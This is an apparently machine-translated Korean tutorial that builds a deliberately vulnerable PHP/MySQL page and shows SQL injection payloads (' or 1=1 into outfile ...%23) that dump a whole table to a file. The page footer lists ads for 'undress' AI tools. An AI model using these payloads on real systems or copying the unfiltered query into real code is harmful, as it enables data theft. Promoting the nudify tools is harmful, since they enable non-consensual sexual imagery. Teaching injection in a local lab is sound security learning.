SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 학습한 후 요약한 것일 뿐 깊이가 없습니다.
이전 기사와 마찬가지로 데이터 테이블을 생성하고 테스트 목적으로 테이블 안팎에 여러 데이터 조각을 추가해야 합니다.
데이터베이스에 테이블 만들기:
코드는 다음과 같습니다.
CREATE TABLE `article` ( `articleid` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', `content` text CHARACTER SET utf8 NOT NULL, PRIMARY KEY (`articleid`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
테이블에 데이터를 삽입하는 코드는 게시하지 않습니다. 다운로드하여 직접 가져올 수 있습니다. 데이터베이스에.
다음으로 사용자 요청을 처리하는 페이지를 작성합니다. 여기서는 사용자가 제출한 데이터를 의도적으로 필터링하지 않고 테스트를 위해 SQL 주입 취약점을 남겨둡니다.
코드는 다음과 같습니다.
코드는 다음과 같습니다.
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
$id=$_GET['id'];//id未经过滤
$conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
mysql_select_db($dbname,$conn);
mysql_query('set names utf8');
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_query($sql,$conn);
$row = mysql_fetch_array($result);
echo "<p>利用SQL注入漏洞拖库<p>";
if (!$row){
echo "该记录不存在";
exit;
}
echo "标题<br>".$row['title']."<p>";
echo "内容<br>".$row['content']."<p>";
?>브라우저에 직접 입력합니다.
127.0.0.1/marcofly/phpstudy/sqlinsert /showart.php?id=1
기사 테이블에서 ID가 1인 레코드에 접근할 수 있습니다
접근 결과는 다음과 같습니다:
다음으로 이 취약점을 사용하겠습니다(취약점을 모르는 경우 도구 + 수동 탐지를 통해서만 탐지 가능). 기사 표를 다운로드하는 방법을 보여드리겠습니다.
주소 표시줄에 'to outfile 'e:/sql.txt'%23을 입력하세요.
분석: %23은 #의 ASCII 코드입니다. 주소 표시줄이 비어 있으면 주소 표시줄에 %23을 입력하면 #이 되고 다음 SQL 문을 코멘트로 출력합니다.
실행 후 E드라이브를 열어서 sql.txt 파일을 추가로 찾으시면 테이블 글에 기록이 있습니다.
왜 기록이 하나뿐인가요? 이 데이터 테이블에는 레코드가 하나만 있습니까? ID가 1인 하나의 레코드만 검색하기 때문에 그렇지 않습니다. 그러면 기사 테이블의 모든 레코드를 한 번에 다운로드할 수 있습니까?
구성된 SQL 문이 충분히 유연하다면 대답은 '예'입니다(구성된 SQL 문의 유연성이 다시 향상됩니다).
분석 결과, URL 주소 표시줄에 'into outfile 'e:/sql.txt'%23을 입력하면 sql 쿼리문으로 병합되어 다음과 같이 됩니다.
SELECT * FROM Article WHERE articleid='5 ' into outfile 'e:/whf.txt'#'
주의 깊게 분석한 후 다음과 같은 SQL 문을 구성할 수 있습니다.
SELECT * FROM Article WHERE Articleid='' or 1=1 into outfile 'e: /whf.txt'#'
이 경우 WHERE 절 은 무슨 일이 있어도 항상 true입니다. 즉, sql 문은 다음과 같습니다.
SELECT * FROM 기사. into outfile 'e:/whf.txt'#'
이해하세요. sql 문은 먼저 select 문을 실행하여 테이블 Article의 모든 내용을 검색한 다음 outfile 'e:/whf.txt'로 실행합니다. # '컨텐츠를 내보냅니다.
믿지 못하겠다면 실행하면 되는데...
SQL 인젝션 취약점을 이용하면 당연히 테이블명, 컬럼명, 사용자 비밀번호 길이(LEFT 함수) 등을 추측할 수 있다. 위의 데모를 직접 따를 수 있습니다. 테이블의 모든 데이터를 내보내면 테이블 이름, 열 이름 등을 추측할 필요가 없습니다.
좀 피곤해서 여기까지만 쓰겠습니다.
SQL 인젝션 취약점을 이용한 백엔드 로그인과 SQL 인젝션 취약점을 이용한 라이브러리 드래그는 관련 내용을 익힌 후 요약한 내용입니다. 그리고 다른 의미는 없습니다.
【관련 추천】
1. 특별 추천: "php Programmer Toolbox" V0.1 버전 다운로드
2. SQL 인젝션을 방지하려면? SQL 인젝션 예방 방법 5가지 소개
3. 유명한 SQL 인젝션 취약점 검사 도구 5가지 공유
위 내용은 SQL 주입 취약점을 사용하여 라이브러리를 드래그하는 사례 공유의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
InnoDB 버퍼 풀과 성능의 중요성을 설명하십시오.Apr 19, 2025 am 12:24 AMinnodbbufferpool은 데이터와 인덱싱 페이지를 캐싱하여 디스크 I/O를 줄여 데이터베이스 성능을 향상시킵니다. 작업 원칙에는 다음이 포함됩니다. 1. 데이터 읽기 : BufferPool의 데이터 읽기; 2. 데이터 작성 : 데이터 수정 후 BufferPool에 쓰고 정기적으로 디스크로 새로 고치십시오. 3. 캐시 관리 : LRU 알고리즘을 사용하여 캐시 페이지를 관리합니다. 4. 읽기 메커니즘 : 인접한 데이터 페이지를 미리로드합니다. Bufferpool을 크기를 조정하고 여러 인스턴스를 사용하여 데이터베이스 성능을 최적화 할 수 있습니다.
MySQL 대 기타 프로그래밍 언어 : 비교Apr 19, 2025 am 12:22 AM다른 프로그래밍 언어와 비교할 때 MySQL은 주로 데이터를 저장하고 관리하는 데 사용되는 반면 Python, Java 및 C와 같은 다른 언어는 논리적 처리 및 응용 프로그램 개발에 사용됩니다. MySQL은 데이터 관리 요구에 적합한 고성능, 확장 성 및 크로스 플랫폼 지원으로 유명하며 다른 언어는 데이터 분석, 엔터프라이즈 애플리케이션 및 시스템 프로그래밍과 같은 해당 분야에서 이점이 있습니다.
MySQL 학습 : 새로운 사용자를위한 단계별 안내서Apr 19, 2025 am 12:19 AMMySQL은 데이터 저장, 관리 및 분석에 적합한 강력한 오픈 소스 데이터베이스 관리 시스템이기 때문에 학습 할 가치가 있습니다. 1) MySQL은 SQL을 사용하여 데이터를 작동하고 구조화 된 데이터 관리에 적합한 관계형 데이터베이스입니다. 2) SQL 언어는 MySQL과 상호 작용하는 열쇠이며 CRUD 작업을 지원합니다. 3) MySQL의 작동 원리에는 클라이언트/서버 아키텍처, 스토리지 엔진 및 쿼리 최적화가 포함됩니다. 4) 기본 사용에는 데이터베이스 및 테이블 작성이 포함되며 고급 사용량은 Join을 사용하여 테이블을 결합하는 것과 관련이 있습니다. 5) 일반적인 오류에는 구문 오류 및 권한 문제가 포함되며 디버깅 기술에는 구문 확인 및 설명 명령 사용이 포함됩니다. 6) 성능 최적화에는 인덱스 사용, SQL 문의 최적화 및 데이터베이스의 정기 유지 보수가 포함됩니다.
MySQL : 초보자가 마스터하는 필수 기술Apr 18, 2025 am 12:24 AMMySQL은 초보자가 데이터베이스 기술을 배우는 데 적합합니다. 1. MySQL 서버 및 클라이언트 도구를 설치하십시오. 2. SELECT와 같은 기본 SQL 쿼리를 이해하십시오. 3. 마스터 데이터 작업 : 데이터를 만들고, 삽입, 업데이트 및 삭제합니다. 4. 고급 기술 배우기 : 하위 쿼리 및 창 함수. 5. 디버깅 및 최적화 : 구문 확인, 인덱스 사용, 선택*을 피하고 제한을 사용하십시오.
MySQL : 구조화 된 데이터 및 관계형 데이터베이스Apr 18, 2025 am 12:22 AMMySQL은 테이블 구조 및 SQL 쿼리를 통해 구조화 된 데이터를 효율적으로 관리하고 외래 키를 통해 테이블 간 관계를 구현합니다. 1. 테이블을 만들 때 데이터 형식을 정의하고 입력하십시오. 2. 외래 키를 사용하여 테이블 간의 관계를 설정하십시오. 3. 인덱싱 및 쿼리 최적화를 통해 성능을 향상시킵니다. 4. 데이터 보안 및 성능 최적화를 보장하기 위해 데이터베이스를 정기적으로 백업 및 모니터링합니다.
MySQL : 주요 기능 및 기능이 설명되었습니다Apr 18, 2025 am 12:17 AMMySQL은 웹 개발에 널리 사용되는 오픈 소스 관계형 데이터베이스 관리 시스템입니다. 주요 기능에는 다음이 포함됩니다. 1. 다른 시나리오에 적합한 InnoDB 및 MyISAM과 같은 여러 스토리지 엔진을 지원합니다. 2.로드 밸런싱 및 데이터 백업을 용이하게하기 위해 마스터 슬레이브 복제 기능을 제공합니다. 3. 쿼리 최적화 및 색인 사용을 통해 쿼리 효율성을 향상시킵니다.
SQL의 목적 : MySQL 데이터베이스와 상호 작용합니다Apr 18, 2025 am 12:12 AMSQL은 MySQL 데이터베이스와 상호 작용하여 데이터 첨가, 삭제, 수정, 검사 및 데이터베이스 설계를 실현하는 데 사용됩니다. 1) SQL은 Select, Insert, Update, Delete 문을 통해 데이터 작업을 수행합니다. 2) 데이터베이스 설계 및 관리에 대한 생성, 변경, 삭제 문을 사용하십시오. 3) 복잡한 쿼리 및 데이터 분석은 SQL을 통해 구현되어 비즈니스 의사 결정 효율성을 향상시킵니다.
초보자를위한 MySQL : 데이터베이스 관리를 시작합니다Apr 18, 2025 am 12:10 AMMySQL의 기본 작업에는 데이터베이스, 테이블 작성 및 SQL을 사용하여 데이터에서 CRUD 작업을 수행하는 것이 포함됩니다. 1. 데이터베이스 생성 : createAbasemy_first_db; 2. 테이블 만들기 : CreateTableBooks (idintauto_incrementprimarykey, titlevarchar (100) notnull, authorvarchar (100) notnull, published_yearint); 3. 데이터 삽입 : InsertIntobooks (Title, Author, Published_year) VA
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
AI Hentai Generator
AI Hentai를 무료로 생성하십시오.
인기 기사
뜨거운 도구
DVWA
DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
SublimeText3 영어 버전
권장 사항: Win 버전, 코드 프롬프트 지원!
ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경
PhpStorm 맥 버전
최신(2018.2.1) 전문 PHP 통합 개발 도구
